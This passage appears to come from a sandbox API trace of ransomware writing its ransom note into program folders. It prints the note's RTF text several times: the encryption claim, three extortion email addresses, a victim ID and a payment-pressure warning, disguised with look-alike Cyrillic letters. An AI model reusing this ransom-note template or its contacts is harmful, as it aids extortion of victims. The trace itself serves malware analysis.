pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.524] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.526] CloseHandle (hObject=0x1fc) returned 1 [0064.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\bg85_info.rtf")) returned 0xffffffff [0064.526] GetLastError () returned 0x2 [0064.526] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 